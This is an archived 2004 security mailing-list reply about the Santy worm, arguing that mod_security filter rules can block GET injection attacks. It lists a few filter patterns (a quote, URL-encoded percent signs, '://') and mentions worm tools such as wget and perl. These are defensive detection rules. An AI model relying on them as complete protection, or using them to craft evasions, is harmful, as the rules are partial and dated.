Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



WebApp Sec: RE: The Santy worm and Application Security

RE: The Santy worm and Application Security

From: Paul Laudanski <zx_at_castlecops.com>
Date: Fri, 31 Dec 2004 21:21:22 -0500 (EST)

On Fri, 31 Dec 2004, Ofer Shezaf wrote:

>
> I must point you to an interesting thread in bugtraq (see excerpts
> below) - as you can see, people writing rules for mod_security
> understand that the rules are limited to a specific worm but usually
> cannot handle potential variants.
>
> "Santy" and "phpInclude" emphasize the need for real application
> security measurements such as code review, application layer scanning
> and real time application layer security. Simpler IPS system such as
> mod_security (as well as commercial products that cost a lot of money
> such as CheckPoint Web Intelligence, IntruShield or Proventia) cannot
> effectively handle such attacks.

Actually some of the rules like the ones I have written look for what I've
found to be quite useful to protect against, characters such as:

'
%25
%2527
://

Filters such as these, that do not filter on "perl" or "wget" effectively
catch not just the santy and phpinclude attacks, but all other kinds of
GET injections. Based on the sheer number of attacks I've logged, such
filters are effectively handling those attacks.

However, one must note that security is not about using a single source of
protection, it is the art of security layering that is prudent to apply.
mod_security is just a step in that process.

To your point, developers must pay more attention when coding to ensure
that variables and arguments are properly sanitized. For PHP sites,
mod_security has a mechanism to protect against register_globals as well.

Here are quite a few you can read on:

http://modsecurity.org/documentation/snortmodsec-rules.txt

There are other sources of security that can be applied to Apache, just as
mod_dosevasive and mod_require_host.

On the excerpts you've quoted, I can understand and appreciate the variety
of attacks that can be formed and sent. If history has taught us
anything, in the real and online worlds, anything breachable.

However, I'm not so sure that a blanket statement that products, like
those you mention above, cannot handle such attacks is not a fair one at
all. I suggest you read some of the articles on mod_security:

ref: http://modsecurity.org/documentation/index.html

http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html
http://www.securityfocus.com/infocus/1739
http://modsecurity.org/documentation/apache-internal-chroot.html
http://modsecurity.org/documentation/php-register-globals.html

In your initial email you discuss real time application monitoring. I
don't see how mod_security is any different as it inspects GETs and or
POSTs real time.

If santy and phpinclude have accomplished anything positive, I hope that
it highlights (no pun intended) to coders the need to refocus on securing
their applications. 

-- 
Regards,
Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
Received on Jan 02 2005
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]